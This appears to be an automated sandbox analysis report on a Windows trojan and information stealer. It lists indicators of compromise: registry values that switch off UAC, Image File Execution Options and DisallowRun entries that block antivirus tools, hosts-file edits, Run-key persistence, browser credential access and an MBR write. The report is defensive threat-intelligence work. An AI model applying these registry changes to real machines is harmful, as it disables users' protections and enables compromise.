48f3f9c5cf9678fc59bcc1f4cb544939aecd8b24a440f89afc43fe841976f0d5

Analysis

max time kernel
149s
max time network
148s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
29/09/2024, 03:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Size

2.3MB
MD5

fdc031f72e08a96adb15cfae8a259859
SHA1

0d9ffbf47c957c13d503fd822d50c13d5d52e63e
SHA256

48f3f9c5cf9678fc59bcc1f4cb544939aecd8b24a440f89afc43fe841976f0d5
SHA512

31bef5e91d4a34166e840a0bfd11c11bce4be056907e6f6bf33247f4b93683ccfdb4854cdfda970f78d332a1c406397519b50fcdc13377108c928336e8b62c00
SSDEEP

49152:wvwJPj4u9IfI52XJlzUN0KDoTtaJb1iI/lNakO915P:FPJl5KJ9UiKEkJb1i

Score

10^/10

bootkit discovery evasion persistence privilege_escalation spyware stealer trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 6 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "2"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "2"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

Blocks application from running via registry modification 18 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "egui.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "avgnt.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "avcenter.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "MSASCui.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "ekrn.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "avgemc.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\0 = "msseces.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "avgfrw.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "avgui.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "avgcfgex.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "avscan.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "avgscanx.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "avgcmgr.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "avgtray.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "avgchsvx.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "avgwdsvc.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

Drops file in Drivers directory 5 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened for modification	C:\Windows\system32\drivers\etc\host_new	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File created	C:\Windows\system32\drivers\etc\host_new	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shield.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmdagent.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgw.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gbn976rl.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lookout.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\backweb.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgnsx.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kavpers40eng.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mostat.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sofi.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\titanin.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfpupdat.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\apimonitor.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpcc.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsav.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\infwin.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netmon.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\titaninxp.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fixfp.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atguard.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bipcp.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sofi.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wininetd.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\alevir.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\n32scanw.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\_avpm.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\alogserv.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avwin95.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nvarch16.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rescue32.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgwdsvc.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswUpdSv.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANCU.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcshell.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dllcache.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hwpe.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\idle.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mctool.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmdagent.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smss32.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winppr32.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mfin32.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luau.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pav.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashUpd.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cleaner3.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navapsvc.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\w9x.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winactive.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tapinstall.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nisum.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pcscan.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dvp95_0.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windows Police Pro.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdfvwiz.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avptc32.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msiexec16.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safeweb.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sphinx.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\antivirusxppro2009.exe	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aAvgApi.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fp-win_trial.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spf.exe\Debugger = "svchost.exe"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

Loads dropped DLL 4 IoCs

pid	Process
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
1532	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Unexpected DNS network traffic destination 36 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.222.222

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key deleted	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\Best Malware Protection = "\"C:\\ProgramData\\0b590\\BM5d5.exe\" /s /d"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Eset\Nod\	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

Enumerates connected drives 3 TTPs 21 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\W:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\I:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\M:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\J:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\Q:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\U:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\V:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\E:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\H:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\S:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\T:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\X:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\Z:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\G:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\R:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\N:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\O:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\P:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\Y:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\K:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe
File opened (read-only)	\??\L:	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2156 set thread context of 1532	2156	fdc031f72e08a96adb15cfae8a259859_JaffaCakes118.exe	30

UPX packed file 55 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1532-3-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-6-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-8-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-7-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-251-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-257-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-264-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-249-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-248-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-247-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-265-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-266-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-327-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-303-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-382-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-384-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-386-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-388-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-389-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-402-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-383-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-364-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-331-0x0000000013140000-0x000000001372D000-memory.dmp	upx
behavioral1/memory/1532-324-0x0000000013140000-0x000000001372D000-memory.dmp	upx
